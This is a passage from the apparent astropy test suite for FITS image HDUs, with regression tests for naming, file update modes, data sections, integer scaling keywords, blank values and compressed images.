aafits = self.temp('a_fileobj_slice.fits')
bbfits = self.temp('b_fileobj_slice.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a[::2, ::2]).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b[::2, ::2]).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bbfits), a[::2, ::2])
def test_primary_with_extname(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/151
Tests that the EXTNAME keyword works with Primary HDUs as well, and
interacts properly with the .name attribute. For convenience
hdulist['PRIMARY'] will still refer to the first HDU even if it has an
EXTNAME not equal to 'PRIMARY'.
"""
prihdr = fits.Header([('EXTNAME', 'XPRIMARY'), ('EXTVER', 1)])
hdul = fits.HDUList([fits.PrimaryHDU(header=prihdr)])
assert 'EXTNAME' in hdul[0].header
assert hdul[0].name == 'XPRIMARY'
assert hdul[0].name == hdul[0].header['EXTNAME']
info = [(0, 'XPRIMARY', 1, 'PrimaryHDU', 5, (), '', '')]
assert hdul.info(output=False) == info
assert hdul['PRIMARY'] is hdul['XPRIMARY']
assert hdul['PRIMARY'] is hdul[('XPRIMARY', 1)]
hdul[0].name = 'XPRIMARY2'
assert hdul[0].header['EXTNAME'] == 'XPRIMARY2'
hdul.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert hdul[0].name == 'XPRIMARY2'
# This test used to fail on Windows - if it fails again in future, see
# https://github.com/astropy/astropy/issues/5797
# The warning appears on Windows but cannot be explicitly caught.
@pytest.mark.filterwarnings("ignore:Assigning the 'data' attribute is an "
"inherently unsafe operation")
def test_io_manipulation(self):
# Get a keyword value. An extension can be referred by name or by
# number. Both extension and keyword names are case insensitive.
with fits.open(self.data('test0.fits')) as r:
assert r['primary'].header['naxis'] == 0
assert r[0].header['naxis'] == 0
# If there are more than one extension with the same EXTNAME value,
# the EXTVER can be used (as the second argument) to distinguish
# the extension.
assert r['sci', 1].header['detector'] == 1
# append (using "update()") a new card
r[0].header['xxx'] = 1.234e56
assert ('\n'.join(str(x) for x in r[0].header.cards[-3:]) ==
"EXPFLAG = 'NORMAL ' / Exposure interruption indicator \n"
"FILENAME= 'vtest3.fits' / File name \n"
"XXX = 1.234E+56 ")
# rename a keyword
r[0].header.rename_keyword('filename', 'fname')
pytest.raises(ValueError, r[0].header.rename_keyword, 'fname',
'history')
pytest.raises(ValueError, r[0].header.rename_keyword, 'fname',
'simple')
r[0].header.rename_keyword('fname', 'filename')
# get a subsection of data
assert np.array_equal(r[2].data[:3, :3],
np.array([[349, 349, 348],
[349, 349, 347],
[347, 350, 349]], dtype=np.int16))
# We can create a new FITS file by opening a new file with "append"
# mode.
with fits.open(self.temp('test_new.fits'), mode='append') as n:
# Append the primary header and the 2nd extension to the new
# file.
n.append(r[0])
n.append(r[2])
# The flush method will write the current HDUList object back
# to the newly created file on disk. The HDUList is still open
# and can be further operated.
n.flush()
assert n[1].data[1, 1] == 349
# modify a data point
n[1].data[1, 1] = 99
# When the file is closed, the most recent additions of
                # extension(s) since the last flush() will be appended, but any
                # HDU that already existed at the last flush will not be modified
del n
# If an existing file is opened with "append" mode, like the
            # readonly mode, the HDUs will be read into the HDUList, which can
            # be modified in memory but cannot be written back to the original
            # file. A file opened with append mode can only add new HDUs.
os.rename(self.temp('test_new.fits'),
self.temp('test_append.fits'))
with fits.open(self.temp('test_append.fits'), mode='append') as a:
# The above change did not take effect since this was made
# after the flush().
assert a[1].data[1, 1] == 349
a.append(r[1])
del a
# When changes are made to an HDUList which was opened with
# "update" mode, they will be written back to the original file
# when a flush/close is called.
os.rename(self.temp('test_append.fits'),
self.temp('test_update.fits'))
with fits.open(self.temp('test_update.fits'), mode='update') as u:
# When the changes do not alter the size structures of the
# original (or since last flush) HDUList, the changes are
# written back "in place".
assert u[0].header['rootname'] == 'U2EQ0201T'
u[0].header['rootname'] = 'abc'
assert u[1].data[1, 1] == 349
u[1].data[1, 1] = 99
u.flush()
# If the changes affect the size structure, e.g. adding or
# deleting HDU(s), header was expanded or reduced beyond
# existing number of blocks (2880 bytes in each block), or
# change the data size, the HDUList is written to a temporary
# file, the original file is deleted, and the temporary file is
# renamed to the original file name and reopened in the update
# mode. To a user, these two kinds of updating writeback seem
# to be the same, unless the optional argument in flush or
# close is set to 1.
del u[2]
u.flush()
# The write method in HDUList class writes the current HDUList,
# with all changes made up to now, to a new file. This method
                # works the same regardless of the mode the HDUList was opened
# with.
u.append(r[3])
u.writeto(self.temp('test_new.fits'))
del u
# Another useful new HDUList method is readall. It will "touch" the
# data parts in all HDUs, so even if the HDUList is closed, we can
# still operate on the data.
with fits.open(self.data('test0.fits')) as r:
r.readall()
assert r[1].data[1, 1] == 315
# create an HDU with data only
data = np.ones((3, 5), dtype=np.float32)
hdu = fits.ImageHDU(data=data, name='SCI')
assert np.array_equal(hdu.data,
np.array([[1., 1., 1., 1., 1.],
[1., 1., 1., 1., 1.],
[1., 1., 1., 1., 1.]],
dtype=np.float32))
# create an HDU with header and data
# notice that the header has the right NAXIS's since it is constructed
# with ImageHDU
hdu2 = fits.ImageHDU(header=r[1].header, data=np.array([1, 2],
dtype='int32'))
assert ('\n'.join(str(x) for x in hdu2.header.cards[1:5]) ==
"BITPIX = 32 / array data type \n"
"NAXIS = 1 / number of array dimensions \n"
"NAXIS1 = 2 \n"
"PCOUNT = 0 / number of parameters ")
def test_memory_mapping(self):
# memory mapping
f1 = fits.open(self.data('test0.fits'), memmap=1)
f1.close()
def test_verification_on_output(self):
# verification on output
# make a defect HDUList first
x = fits.ImageHDU()
hdu = fits.HDUList(x) # HDUList can take a list or one single HDU
with catch_warnings() as w:
hdu.verify()
text = "HDUList's 0th element is not a primary HDU."
assert len(w) == 3
assert text in str(w[1].message)
with catch_warnings() as w:
hdu.writeto(self.temp('test_new2.fits'), 'fix')
text = ("HDUList's 0th element is not a primary HDU. "
"Fixed by inserting one as 0th HDU.")
assert len(w) == 3
assert text in str(w[1].message)
def test_section(self):
# section testing
fs = fits.open(self.data('arange.fits'))
assert np.array_equal(fs[0].section[3, 2, 5], 357)
assert np.array_equal(
fs[0].section[3, 2, :],
np.array([352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362]))
assert np.array_equal(fs[0].section[3, 2, 4:],
np.array([356, 357, 358, 359, 360, 361, 362]))
assert np.array_equal(fs[0].section[3, 2, :8],
np.array([352, 353, 354, 355, 356, 357, 358, 359]))
assert np.array_equal(fs[0].section[3, 2, -8:8],
np.array([355, 356, 357, 358, 359]))
assert np.array_equal(
fs[0].section[3, 2:5, :],
np.array([[352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362],
[363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373],
[374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384]]))
assert np.array_equal(fs[0].section[3, :, :][:3, :3],
np.array([[330, 331, 332],
[341, 342, 343],
[352, 353, 354]]))
dat = fs[0].data
assert np.array_equal(fs[0].section[3, 2:5, :8], dat[3, 2:5, :8])
assert np.array_equal(fs[0].section[3, 2:5, 3], dat[3, 2:5, 3])
assert np.array_equal(fs[0].section[3:6, :, :][:3, :3, :3],
np.array([[[330, 331, 332],
[341, 342, 343],
[352, 353, 354]],
[[440, 441, 442],
[451, 452, 453],
[462, 463, 464]],
[[550, 551, 552],
[561, 562, 563],
[572, 573, 574]]]))
assert np.array_equal(fs[0].section[:, :, :][:3, :2, :2],
np.array([[[0, 1],
[11, 12]],
[[110, 111],
[121, 122]],
[[220, 221],
[231, 232]]]))
assert np.array_equal(fs[0].section[:, 2, :], dat[:, 2, :])
assert np.array_equal(fs[0].section[:, 2:5, :], dat[:, 2:5, :])
assert np.array_equal(fs[0].section[3:6, 3, :], dat[3:6, 3, :])
assert np.array_equal(fs[0].section[3:6, 3:7, :], dat[3:6, 3:7, :])
assert np.array_equal(fs[0].section[:, ::2], dat[:, ::2])
assert np.array_equal(fs[0].section[:, [1, 2, 4], 3],
dat[:, [1, 2, 4], 3])
bool_index = np.array([True, False, True, True, False,
False, True, True, False, True])
assert np.array_equal(fs[0].section[:, bool_index, :],
dat[:, bool_index, :])
assert np.array_equal(
fs[0].section[3:6, 3, :, ...], dat[3:6, 3, :, ...])
assert np.array_equal(fs[0].section[..., ::2], dat[..., ::2])
assert np.array_equal(fs[0].section[..., [1, 2, 4], 3],
dat[..., [1, 2, 4], 3])
fs.close()
def test_section_data_single(self):
a = np.array([1])
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
sec = hdul[0].section
dat = hdul[0].data
assert np.array_equal(sec[0], dat[0])
assert np.array_equal(sec[...], dat[...])
assert np.array_equal(sec[..., 0], dat[..., 0])
assert np.array_equal(sec[0, ...], dat[0, ...])
hdul.close()
def test_section_data_square(self):
a = np.arange(4).reshape(2, 2)
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[0, :] == dat[0, :]).all()
assert (d.section[1, :] == dat[1, :]).all()
assert (d.section[:, 0] == dat[:, 0]).all()
assert (d.section[:, 1] == dat[:, 1]).all()
assert (d.section[0, 0] == dat[0, 0]).all()
assert (d.section[0, 1] == dat[0, 1]).all()
assert (d.section[1, 0] == dat[1, 0]).all()
assert (d.section[1, 1] == dat[1, 1]).all()
assert (d.section[0:1, 0:1] == dat[0:1, 0:1]).all()
assert (d.section[0:2, 0:1] == dat[0:2, 0:1]).all()
assert (d.section[0:1, 0:2] == dat[0:1, 0:2]).all()
assert (d.section[0:2, 0:2] == dat[0:2, 0:2]).all()
hdul.close()
def test_section_data_cube(self):
a = np.arange(18).reshape(2, 3, 3)
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:] == dat[:]).all()
assert (d.section[:, :] == dat[:, :]).all()
# Test that various combinations of indexing on the section are equal to
# indexing the data.
# Testing all combinations of scalar-index and [:] for each dimension.
for idx1 in [slice(None), 0, 1]:
for idx2 in [slice(None), 0, 1, 2]:
for idx3 in [slice(None), 0, 1, 2]:
nd_idx = (idx1, idx2, idx3)
assert (d.section[nd_idx] == dat[nd_idx]).all()
# Test all ways to slice the last dimension but keeping the first two.
for idx3 in [slice(0, 1), slice(0, 2), slice(0, 3),
slice(1, 2), slice(1, 3), slice(2, 3)]:
nd_idx = (slice(None), slice(None), idx3)
assert (d.section[nd_idx] == dat[nd_idx]).all()
# Test various combinations (not exhaustive) to slice all dimensions.
for idx1 in [slice(0, 1), slice(1, 2)]:
for idx2 in [slice(0, 1), slice(0, 2), slice(0, 3),
slice(1, 2), slice(1, 3)]:
for idx3 in [slice(0, 1), slice(0, 2), slice(0, 3),
slice(1, 2), slice(1, 3), slice(2, 3)]:
nd_idx = (idx1, idx2, idx3)
assert (d.section[nd_idx] == dat[nd_idx]).all()
hdul.close()
def test_section_data_four(self):
a = np.arange(256).reshape(4, 4, 4, 4)
hdu = fits.PrimaryHDU(a)
hdu.writeto(self.temp('test_new.fits'))
hdul = fits.open(self.temp('test_new.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:, :, :, :] == dat[:, :, :, :]).all()
assert (d.section[:, :, :] == dat[:, :, :]).all()
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[:] == dat[:]).all()
assert (d.section[0, :, :, :] == dat[0, :, :, :]).all()
assert (d.section[0, :, 0, :] == dat[0, :, 0, :]).all()
assert (d.section[:, :, 0, :] == dat[:, :, 0, :]).all()
assert (d.section[:, 1, 0, :] == dat[:, 1, 0, :]).all()
assert (d.section[:, :, :, 1] == dat[:, :, :, 1]).all()
hdul.close()
def test_section_data_scaled(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/143
This is like test_section_data_square but uses a file containing scaled
image data, to test that sections can work correctly with scaled data.
"""
hdul = fits.open(self.data('scale.fits'))
d = hdul[0]
dat = hdul[0].data
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[0, :] == dat[0, :]).all()
assert (d.section[1, :] == dat[1, :]).all()
assert (d.section[:, 0] == dat[:, 0]).all()
assert (d.section[:, 1] == dat[:, 1]).all()
assert (d.section[0, 0] == dat[0, 0]).all()
assert (d.section[0, 1] == dat[0, 1]).all()
assert (d.section[1, 0] == dat[1, 0]).all()
assert (d.section[1, 1] == dat[1, 1]).all()
assert (d.section[0:1, 0:1] == dat[0:1, 0:1]).all()
assert (d.section[0:2, 0:1] == dat[0:2, 0:1]).all()
assert (d.section[0:1, 0:2] == dat[0:1, 0:2]).all()
assert (d.section[0:2, 0:2] == dat[0:2, 0:2]).all()
hdul.close()
# Test without having accessed the full data first
hdul = fits.open(self.data('scale.fits'))
d = hdul[0]
assert (d.section[:, :] == dat[:, :]).all()
assert (d.section[0, :] == dat[0, :]).all()
assert (d.section[1, :] == dat[1, :]).all()
assert (d.section[:, 0] == dat[:, 0]).all()
assert (d.section[:, 1] == dat[:, 1]).all()
assert (d.section[0, 0] == dat[0, 0]).all()
assert (d.section[0, 1] == dat[0, 1]).all()
assert (d.section[1, 0] == dat[1, 0]).all()
assert (d.section[1, 1] == dat[1, 1]).all()
assert (d.section[0:1, 0:1] == dat[0:1, 0:1]).all()
assert (d.section[0:2, 0:1] == dat[0:2, 0:1]).all()
assert (d.section[0:1, 0:2] == dat[0:1, 0:2]).all()
assert (d.section[0:2, 0:2] == dat[0:2, 0:2]).all()
assert not d._data_loaded
hdul.close()
def test_do_not_scale_image_data(self):
with fits.open(self.data('scale.fits'), do_not_scale_image_data=True) as hdul:
assert hdul[0].data.dtype == np.dtype('>i2')
with fits.open(self.data('scale.fits')) as hdul:
assert hdul[0].data.dtype == np.dtype('float32')
def test_append_uint_data(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/56
(BZERO and BSCALE added in the wrong location when appending scaled
data)
"""
fits.writeto(self.temp('test_new.fits'), data=np.array([],
dtype='uint8'))
d = np.zeros([100, 100]).astype('uint16')
fits.append(self.temp('test_new.fits'), data=d)
with fits.open(self.temp('test_new.fits'), uint=True) as f:
assert f[1].data.dtype == 'uint16'
def test_scale_with_explicit_bzero_bscale(self):
"""
Regression test for https://github.com/astropy/astropy/issues/6399
"""
hdu2 = fits.ImageHDU(np.random.rand(100, 100))
# The line below raised an exception in astropy 2.0, so if it does not
# raise an error here, that is progress.
hdu2.scale(type='uint8', bscale=1, bzero=0)
def test_uint_header_consistency(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2305
This ensures that an HDU containing unsigned integer data always has
        the appropriate BZERO value in its header.
"""
for int_size in (16, 32, 64):
# Just make an array of some unsigned ints that wouldn't fit in a
# signed int array of the same bit width
max_uint = (2 ** int_size) - 1
if int_size == 64:
                max_uint = np.uint64(max_uint)
dtype = f'uint{int_size}'
arr = np.empty(100, dtype=dtype)
arr.fill(max_uint)
arr -= np.arange(100, dtype=dtype)
uint_hdu = fits.PrimaryHDU(data=arr)
assert np.all(uint_hdu.data == arr)
assert uint_hdu.data.dtype.name == f'uint{int_size}'
assert 'BZERO' in uint_hdu.header
assert uint_hdu.header['BZERO'] == (2 ** (int_size - 1))
filename = f'uint{int_size}.fits'
uint_hdu.writeto(self.temp(filename))
with fits.open(self.temp(filename), uint=True) as hdul:
new_uint_hdu = hdul[0]
assert np.all(new_uint_hdu.data == arr)
assert new_uint_hdu.data.dtype.name == f'uint{int_size}'
assert 'BZERO' in new_uint_hdu.header
assert new_uint_hdu.header['BZERO'] == (2 ** (int_size - 1))
@pytest.mark.parametrize(('from_file'), (False, True))
@pytest.mark.parametrize(('do_not_scale'), (False,))
def test_uint_header_keywords_removed_after_bitpix_change(self,
from_file,
do_not_scale):
"""
Regression test for https://github.com/astropy/astropy/issues/4974
BZERO/BSCALE should be removed if data is converted to a floating
point type.
Currently excluding the case where do_not_scale_image_data=True
because it is not clear what the expectation should be.
"""
arr = np.zeros(100, dtype='uint16')
if from_file:
# To generate the proper input file we always want to scale the
# data before writing it...otherwise when we open it will be
# regular (signed) int data.
tmp_uint = fits.PrimaryHDU(arr)
filename = 'unsigned_int.fits'
tmp_uint.writeto(self.temp(filename))
with fits.open(self.temp(filename),
do_not_scale_image_data=do_not_scale) as f:
uint_hdu = f[0]
# Force a read before we close.
_ = uint_hdu.data
else:
uint_hdu = fits.PrimaryHDU(arr,
do_not_scale_image_data=do_not_scale)
# Make sure appropriate keywords are in the header. See
# https://github.com/astropy/astropy/pull/3916#issuecomment-122414532
# for discussion.
assert 'BSCALE' in uint_hdu.header
assert 'BZERO' in uint_hdu.header
assert uint_hdu.header['BSCALE'] == 1
assert uint_hdu.header['BZERO'] == 32768
# Convert data to floating point...
uint_hdu.data = uint_hdu.data * 1.0
# ...bitpix should be negative.
assert uint_hdu.header['BITPIX'] < 0
# BSCALE and BZERO should NOT be in header any more.
assert 'BSCALE' not in uint_hdu.header
assert 'BZERO' not in uint_hdu.header
# This is the main test...the data values should round trip
# as zero.
filename = 'test_uint_to_float.fits'
uint_hdu.writeto(self.temp(filename))
with fits.open(self.temp(filename)) as hdul:
assert (hdul[0].data == 0).all()
def test_blanks(self):
"""Test image data with blank spots in it (which should show up as
        NaNs in the data array).
"""
arr = np.zeros((10, 10), dtype=np.int32)
# One row will be blanks
arr[1] = 999
hdu = fits.ImageHDU(data=arr)
hdu.header['BLANK'] = 999
hdu.writeto(self.temp('test_new.fits'))
with fits.open(self.temp('test_new.fits')) as hdul:
assert np.isnan(hdul[1].data[1]).all()
def test_invalid_blanks(self):
"""
Test that invalid use of the BLANK keyword leads to an appropriate
warning, and that the BLANK keyword is ignored when returning the
HDU data.
Regression test for https://github.com/astropy/astropy/issues/3865
"""
arr = np.arange(5, dtype=np.float64)
hdu = fits.PrimaryHDU(data=arr)
hdu.header['BLANK'] = 2
with catch_warnings() as w:
hdu.writeto(self.temp('test_new.fits'))
# Allow the HDU to be written, but there should be a warning
            # when writing a header with BLANK when the data is not
# int
assert len(w) == 1
assert "Invalid 'BLANK' keyword in header" in str(w[0].message)
# Should also get a warning when opening the file, and the BLANK
# value should not be applied
with catch_warnings() as w:
with fits.open(self.temp('test_new.fits')) as h:
assert len(w) == 1
assert "Invalid 'BLANK' keyword in header" in str(w[0].message)
assert np.all(arr == h[0].data)
def test_scale_back_with_blanks(self):
"""
Test that when auto-rescaling integer data with "blank" values (where
the blanks are replaced by NaN in the float data), that the "BLANK"
keyword is removed from the header.
Further, test that when using the ``scale_back=True`` option the blank
values are restored properly.
Regression test for https://github.com/astropy/astropy/issues/3865
"""
# Make the sample file
arr = np.arange(5, dtype=np.int32)
hdu = fits.PrimaryHDU(data=arr)
hdu.scale('int16', bscale=1.23)
# Creating data that uses BLANK is currently kludgy--a separate issue
# TODO: Rewrite this test when scaling with blank support is better
# supported
# Let's just add a value to the data that should be converted to NaN
# when it is read back in:
filename = self.temp('test.fits')
hdu.data[0] = 9999
hdu.header['BLANK'] = 9999
hdu.writeto(filename)
with fits.open(filename) as hdul:
data = hdul[0].data
assert np.isnan(data[0])
with pytest.warns(fits.verify.VerifyWarning,
match=r"Invalid 'BLANK' keyword in header"):
hdul.writeto(self.temp('test2.fits'))
# Now reopen the newly written file. It should not have a 'BLANK'
# keyword
with catch_warnings() as w:
with fits.open(self.temp('test2.fits')) as hdul2:
assert len(w) == 0
assert 'BLANK' not in hdul2[0].header
data = hdul2[0].data
assert np.isnan(data[0])
# Finally, test that scale_back keeps the BLANKs correctly
with fits.open(filename, scale_back=True,
mode='update') as hdul3:
data = hdul3[0].data
assert np.isnan(data[0])
with fits.open(filename,
do_not_scale_image_data=True) as hdul4:
assert hdul4[0].header['BLANK'] == 9999
assert hdul4[0].header['BSCALE'] == 1.23
assert hdul4[0].data[0] == 9999
def test_bzero_with_floats(self):
"""Test use of the BZERO keyword in an image HDU containing float
data.
"""
arr = np.zeros((10, 10)) - 1
hdu = fits.ImageHDU(data=arr)
hdu.header['BZERO'] = 1.0
hdu.writeto(self.temp('test_new.fits'))
with fits.open(self.temp('test_new.fits')) as hdul:
arr += 1
assert (hdul[1].data == arr).all()
def test_rewriting_large_scaled_image(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/84 and
https://aeon.stsci.edu/ssb/trac/pyfits/ticket/101
"""
hdul = fits.open(self.data('fixed-1890.fits'))
orig_data = hdul[0].data
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[0].data == orig_data).all()
hdul.close()
# Just as before, but this time don't touch hdul[0].data before writing
# back out--this is the case that failed in
# https://aeon.stsci.edu/ssb/trac/pyfits/ticket/84
hdul = fits.open(self.data('fixed-1890.fits'))
with ignore_warnings():
hdul.writeto(self.temp('test_new.fits'), overwrite=True)
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[0].data == orig_data).all()
hdul.close()
# Test opening/closing/reopening a scaled file in update mode
hdul = fits.open(self.data('fixed-1890.fits'),
do_not_scale_image_data=True)
hdul.writeto(self.temp('test_new.fits'), overwrite=True,
output_verify='silentfix')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
orig_data = hdul[0].data
hdul.close()
hdul = fits.open(self.temp('test_new.fits'), mode='update')
hdul.close()
hdul = fits.open(self.temp('test_new.fits'))
assert (hdul[0].data == orig_data).all()
hdul = fits.open(self.temp('test_new.fits'))
hdul.close()
def test_image_update_header(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/105
Replacing the original header to an image HDU and saving should update
the NAXISn keywords appropriately and save the image data correctly.
"""
# Copy the original file before saving to it
self.copy_file('test0.fits')
with fits.open(self.temp('test0.fits'), mode='update') as hdul:
orig_data = hdul[1].data.copy()
hdr_copy = hdul[1].header.copy()
del hdr_copy['NAXIS*']
hdul[1].header = hdr_copy
with fits.open(self.temp('test0.fits')) as hdul:
assert (orig_data == hdul[1].data).all()
def test_open_scaled_in_update_mode(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/119
(Don't update scaled image data if the data is not read)
This ensures that merely opening and closing a file containing scaled
image data does not cause any change to the data (or the header).
Changes should only occur if the data is accessed.
"""
# Copy the original file before making any possible changes to it
self.copy_file('scale.fits')
mtime = os.stat(self.temp('scale.fits')).st_mtime
time.sleep(1)
fits.open(self.temp('scale.fits'), mode='update').close()
# Ensure that no changes were made to the file merely by immediately
# opening and closing it.
assert mtime == os.stat(self.temp('scale.fits')).st_mtime
# Insert a slight delay to ensure the mtime does change when the file
# is changed
time.sleep(1)
hdul = fits.open(self.temp('scale.fits'), 'update')
orig_data = hdul[0].data
hdul.close()
# Now the file should be updated with the rescaled data
assert mtime != os.stat(self.temp('scale.fits')).st_mtime
hdul = fits.open(self.temp('scale.fits'), mode='update')
assert hdul[0].data.dtype == np.dtype('>f4')
assert hdul[0].header['BITPIX'] == -32
assert 'BZERO' not in hdul[0].header
assert 'BSCALE' not in hdul[0].header
assert (orig_data == hdul[0].data).all()
# Try reshaping the data, then closing and reopening the file; let's
        # see if all the changes are preserved properly
hdul[0].data.shape = (42, 10)
hdul.close()
hdul = fits.open(self.temp('scale.fits'))
assert hdul[0].shape == (42, 10)
assert hdul[0].data.dtype == np.dtype('>f4')
assert hdul[0].header['BITPIX'] == -32
assert 'BZERO' not in hdul[0].header
assert 'BSCALE' not in hdul[0].header
hdul.close()
def test_scale_back(self):
"""A simple test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/120
The scale_back feature for image HDUs.
"""
self.copy_file('scale.fits')
with fits.open(self.temp('scale.fits'), mode='update',
scale_back=True) as hdul:
orig_bitpix = hdul[0].header['BITPIX']
orig_bzero = hdul[0].header['BZERO']
orig_bscale = hdul[0].header['BSCALE']
orig_data = hdul[0].data.copy()
hdul[0].data[0] = 0
with fits.open(self.temp('scale.fits'),
do_not_scale_image_data=True) as hdul:
assert hdul[0].header['BITPIX'] == orig_bitpix
assert hdul[0].header['BZERO'] == orig_bzero
assert hdul[0].header['BSCALE'] == orig_bscale
zero_point = int(math.floor(-orig_bzero / orig_bscale))
assert (hdul[0].data[0] == zero_point).all()
with fits.open(self.temp('scale.fits')) as hdul:
assert (hdul[0].data[1:] == orig_data[1:]).all()
def test_image_none(self):
"""
Regression test for https://github.com/spacetelescope/PyFITS/issues/27
"""
with fits.open(self.data('test0.fits')) as h:
h[1].data
h[1].data = None
h[1].writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as h:
assert h[1].data is None
assert h[1].header['NAXIS'] == 0
assert 'NAXIS1' not in h[1].header
assert 'NAXIS2' not in h[1].header
def test_invalid_blank(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2711
If the BLANK keyword contains an invalid value it should be ignored for
any calculations (though a warning should be issued).
"""
data = np.arange(100, dtype=np.float64)
hdu = fits.PrimaryHDU(data)
hdu.header['BLANK'] = 'nan'
with pytest.warns(fits.verify.VerifyWarning, match=r"Invalid value for "
r"'BLANK' keyword in header: 'nan'"):
hdu.writeto(self.temp('test.fits'))
with catch_warnings() as w:
with fits.open(self.temp('test.fits')) as hdul:
assert np.all(hdul[0].data == data)
assert len(w) == 2
msg = "Invalid value for 'BLANK' keyword in header"
assert msg in str(w[0].message)
msg = "Invalid 'BLANK' keyword"
assert msg in str(w[1].message)
def test_scaled_image_fromfile(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2710
"""
# Make some sample data
a = np.arange(100, dtype=np.float32)
hdu = fits.PrimaryHDU(data=a.copy())
hdu.scale(bscale=1.1)
hdu.writeto(self.temp('test.fits'))
with open(self.temp('test.fits'), 'rb') as f:
file_data = f.read()
hdul = fits.HDUList.fromstring(file_data)
assert np.allclose(hdul[0].data, a)
def test_set_data(self):
"""
Test data assignment - issue #5087
"""
im = fits.ImageHDU()
ar = np.arange(12)
im.data = ar
def test_scale_bzero_with_int_data(self):
"""
Regression test for https://github.com/astropy/astropy/issues/4600
"""
a = np.arange(100, 200, dtype=np.int16)
hdu1 = fits.PrimaryHDU(data=a.copy())
hdu2 = fits.PrimaryHDU(data=a.copy())
# Previously the following line would throw a TypeError,
# now it should be identical to the integer bzero case
hdu1.scale('int16', bzero=99.0)
hdu2.scale('int16', bzero=99)
assert np.allclose(hdu1.data, hdu2.data)
def test_scale_back_uint_assignment(self):
"""
Extend fix for #4600 to assignment to data
Suggested by:
https://github.com/astropy/astropy/pull/4602#issuecomment-208713748
"""
a = np.arange(100, 200, dtype=np.uint16)
fits.PrimaryHDU(a).writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode="update",
scale_back=True) as (hdu,):
hdu.data[:] = 0
assert np.allclose(hdu.data, 0)
class TestCompressedImage(FitsTestCase):
def test_empty(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2595
"""
hdu = fits.CompImageHDU()
assert hdu.data is None
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode='update') as hdul:
assert len(hdul) == 2
assert isinstance(hdul[1], fits.CompImageHDU)
assert hdul[1].data is None
# Now test replacing the empty data with an array and see what
# happens
hdul[1].data = np.arange(100, dtype=np.int32)
with fits.open(self.temp('test.fits')) as hdul:
assert len(hdul) == 2
assert isinstance(hdul[1], fits.CompImageHDU)
assert np.all(hdul[1].data == np.arange(100, dtype=np.int32))
@pytest.mark.parametrize(
('data', 'compression_type', 'quantize_level'),
[(np.zeros((2, 10, 10), dtype=np.float32), 'RICE_1', 16),
(np.zeros((2, 10, 10), dtype=np.float32), 'GZIP_1', -0.01),
(np.zeros((2, 10, 10), dtype=np.float32), 'GZIP_2', -0.01),
(np.zeros((100, 100)) + 1, 'HCOMPRESS_1', 16),
(np.zeros((10, 10)), 'PLIO_1', 16)])
@pytest.mark.parametrize('byte_order', ['<', '>'])
def test_comp_image(self, data, compression_type, quantize_level,
byte_order):
data = data.newbyteorder(byte_order)
primary_hdu = fits.PrimaryHDU()
ofd = fits.HDUList(primary_hdu)
chdu = fits.CompImageHDU(data, name='SCI',
compression_type=compression_type,
quantize_level=quantize_level)
ofd.append(chdu)
ofd.writeto(self.temp('test_new.fits'), overwrite=True)
ofd.close()
with fits.open(self.temp('test_new.fits')) as fd:
assert (fd[1].data == data).all()
assert fd[1].header['NAXIS'] == chdu.header['NAXIS']
assert fd[1].header['NAXIS1'] == chdu.header['NAXIS1']
assert fd[1].header['NAXIS2'] == chdu.header['NAXIS2']
assert fd[1].header['BITPIX'] == chdu.header['BITPIX']
@pytest.mark.skipif('not HAS_SCIPY')
def test_comp_image_quantize_level(self):
"""
Regression test for https://github.com/astropy/astropy/issues/5969
Test that quantize_level is used.
"""
import scipy.misc
np.random.seed(42)
data = scipy.misc.ascent() + np.random.randn(512, 512)*10
fits.ImageHDU(data).writeto(self.temp('im1.fits'))
fits.CompImageHDU(data, compression_type='RICE_1', quantize_method=1,
quantize_level=-1, dither_seed=5)\
.writeto(self.temp('im2.fits'))
fits.CompImageHDU(data, compression_type='RICE_1', quantize_method=1,
quantize_level=-100, dither_seed=5)\
.writeto(self.temp('im3.fits'))
im1 = fits.getdata(self.temp('im1.fits'))
im2 = fits.getdata(self.temp('im2.fits'))
im3 = fits.getdata(self.temp('im3.fits'))
assert not np.array_equal(im2, im3)
assert np.isclose(np.min(im1 - im2), -0.5, atol=1e-3)
assert np.isclose(np.max(im1 - im2), 0.5, atol=1e-3)
assert np.isclose(np.min(im1 - im3), -50, atol=1e-1)
